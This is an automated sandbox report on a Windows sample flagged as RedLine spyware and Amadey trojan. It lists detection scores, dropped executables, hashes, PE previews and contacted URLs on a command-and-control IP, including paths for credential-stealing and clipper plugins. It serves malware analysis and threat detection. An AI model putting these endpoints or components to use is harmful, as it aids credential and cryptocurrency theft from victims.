                            file.exe69%ReversingLabsWin32.Spyware.RedLine
                            file.exe53%VirustotalBrowse
                            file.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe51%ReversingLabsWin32.Trojan.Tedy
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe36%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                            C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%URL Reputationsafe
                            http://62.204.41.4/Gol478Ns/index.php342a20%Avira URL Cloudsafe
                            http://62.204.41.4/Golol478Ns/index.php0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpY&e0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll70%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php:dA0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%URL Reputationmalware
                            62.204.41.4/Gol478Ns/index.php100%URL Reputationmalware
                            http://62.204.41.4/Gol478Ns/index.php2p0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.php100%URL Reputationmalware
                            http://62.204.41.4/Gol478Ns/index.php1FJe0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpdW0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpPe0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpe5342a20%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/index.phpq0%Avira URL Cloudsafe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllE0%Avira URL Cloudsafe
                            No contacted domains info
                            NameMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                            • URL Reputation: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                            • URL Reputation: malware
                            unknown
                            62.204.41.4/Gol478Ns/index.phptrue
                            • URL Reputation: malware
                            low
                            http://62.204.41.4/Gol478Ns/index.phptrue
                            • URL Reputation: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://62.204.41.4/Golol478Ns/index.phpmnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php342a2mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpY&emnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll7mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php:dAmnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php2pmnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpdWmnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.php1FJemnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpPemnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpe5342a2mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exemnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllEmnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://62.204.41.4/Gol478Ns/index.phpqmnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            62.204.41.4
                            unknownUnited Kingdom
                            30798TNNET-ASTNNetOyMainnetworkFItrue
                            IP
                            192.168.2.1
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:801767
                            Start date and time:2023-02-08 17:35:21 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 49s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@37/14@0/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 41% (good quality ratio 39.3%)
                            • Quality average: 85%
                            • Quality standard deviation: 24.3%
                            HCA Information:
                            • Successful, ratio: 93%
                            • Number of executed functions: 99
                            • Number of non-executed functions: 140
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            17:37:23Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            17:37:23API Interceptor2150x Sleep call for process: mnolyk.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            62.204.41.4file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4/Gol478Ns/index.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.125
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            file.exeGet hashmaliciousBrowse
                            • 62.204.41.4
                            No context
                            No context
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):226
                            Entropy (8bit):5.354940450065058
                            Encrypted:false
                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                            MD5:B10E37251C5B495643F331DB2EEC3394
                            SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                            SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                            SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                            Malicious:false
                            Reputation:unknown
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):321
                            Entropy (8bit):5.355221377978991
                            Encrypted:false
                            SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                            MD5:03C5BA5FCE7124B503EA65EF522177C3
                            SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                            SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                            SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                            Malicious:false
                            Reputation:unknown
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):391680
                            Entropy (8bit):7.696200600980202
                            Encrypted:false
                            SSDEEP:6144:KTy+bnr+Bp0yN90QE8rUZ4mLoOCS4IM/yTxjwEC58K+CNJ9EtTZI9AjX:NMrly90tZ4OoOCS4IM/+jwEnKNNJ9EtX
                            MD5:243D9E7FA50F53508036E1579B603367
                            SHA1:C3C66C21E6A47AC83DC507FD334428EC954FC097
                            SHA-256:62F27AF71BE9F88FD1BF94B8B711A81B050457E010C37483BDFFADB08A89CBE5
                            SHA-512:449EE0AF8CE83545FB0EB3F6248B08CFC88C4078AF0E92D22EAAEE44C511A70F3167E1CA71376930DFE6CCEF793C99476AC3C839CB31B30742F4CD61A439E15B
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................P.......p....@...... ...................................... s...................@..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc............t...|..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):241664
                            Entropy (8bit):6.368190069123744
                            Encrypted:false
                            SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                            MD5:8BB923C4D81284DAEF7896E5682DF6C6
                            SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                            SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                            SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):371200
                            Entropy (8bit):6.5684570596278204
                            Encrypted:false
                            SSDEEP:3072:zPz1RIKRNSN36gYwI+JlK1CgR9unxsQi1VV5C5WZr7p9Xaoe7YRLStKRxhUwk:z7X9QZEXMxNirIkr7fgtKBk
                            MD5:7A0C89DA78468AC421B2B1CD1A36DEE9
                            SHA1:15631B339E869BC42C0B027DEEBFD52F03FE736C
                            SHA-256:642257FB52201EB48F5B41DBB961EEE93E95A187006141E6B4F0B525833C280B
                            SHA-512:A06E6CC7ECE58AC7F035B702D25A9049F4184DB159D592D4D88C20A2BF6A901B3ACE68473B0CE420BA038CAF7C50E8D181EFF72194D7888B40DC4CE568F66916
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 36%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........H...H...H...V.R.\...V.D.(...V.C.o...o...A...H...!...V.M.I...V.S.I...V.V.I...RichH...................PE..L......b.....................@.......Q............@..........................`..................................................d........^...................@..X...................................x-..@...............T............................text...j........................... ..`.data...............................@....sozibuyF...........................@..@.zeher...............&..............@..@.rsrc....^.......`...*..............@..@.reloc.......@... ..................@..B........................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):11264
                            Entropy (8bit):4.97029807367379
                            Encrypted:false
                            SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                            MD5:7E93BACBBC33E6652E147E7FE07572A0
                            SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                            SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                            SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 82%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):4.621829903792328
                            Encrypted:false
                            SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                            MD5:1B7C22A214949975556626D7217E9A39
                            SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                            SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                            SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                            Malicious:false
                            Reputation:unknown
                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                            Process:C:\Windows\SysWOW64\cacls.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):15
                            Entropy (8bit):3.240223928941852
                            Encrypted:false
                            SSDEEP:3:o3F:o1
                            MD5:509B054634B6DE74F111C3E646BC80FD
                            SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                            SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                            SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                            Malicious:false
                            Reputation:unknown
                            Preview:processed dir:
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.830718398083216
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:582656
                            MD5:3c86571f94ae2a9b196c945890c4d48a
                            SHA1:7bb15580dc7270573c9d1f76c78133b6f049c9d4
                            SHA256:f3d60db1572877967d2c8a48d1a41c40f40ad459b1965eb959494ade84a22ca2
                            SHA512:716ee022d80c68e2f5a3124cdc51ba9b0a25865b561301790dda79eb79f2717dfd12e5a2170d22381bab371f62a93c15ba5a62a4a17c74cb526362aba41a21bd
                            SSDEEP:12288:/Mr6y90nlvs5dsVuc0WS4BM/+hwOzKNN79ytdZIejhT1jWaQr:1yKvs5ds3U4BM/aKjZid2ebi
                            TLSH:86C40147B7EC4022D8B5237019F602C303767EA06A7897AF274F7D6A1C736A4B635366
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                            Icon Hash:f8e0e4e8ecccc870
                            Entrypoint:0x406a60
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:10
                            OS Version Minor:0
                            File Version Major:10
                            File Version Minor:0
                            Subsystem Version Major:10
                            Subsystem Version Minor:0
                            Import Hash:646167cce332c1c252cdcb1839e0cf48
                            Instruction
                            call 00007F88B4FD8315h
                            jmp 00007F88B4FD7C25h
                            push 00000058h
                            push 004072B8h
                            call 00007F88B4FD83B7h
                            xor ebx, ebx
                            mov dword ptr [ebp-20h], ebx
                            lea eax, dword ptr [ebp-68h]
                            push eax
                            call dword ptr [0040A184h]
                            mov dword ptr [ebp-04h], ebx
                            mov eax, dword ptr fs:[00000018h]
                            mov esi, dword ptr [eax+04h]
                            mov edi, ebx
                            mov edx, 004088ACh
                            mov ecx, esi
                            xor eax, eax
                            lock cmpxchg dword ptr [edx], ecx
                            test eax, eax
                            je 00007F88B4FD7C3Ah
                            cmp eax, esi
                            jne 00007F88B4FD7C29h
                            xor esi, esi
                            inc esi
                            mov edi, esi
                            jmp 00007F88B4FD7C32h
                            push 000003E8h
                            call dword ptr [0040A188h]
                            jmp 00007F88B4FD7BF9h
                            xor esi, esi
                            inc esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007F88B4FD7C2Ch
                            push 0000001Fh
                            call 00007F88B4FD814Bh
                            pop ecx
                            jmp 00007F88B4FD7C5Ch
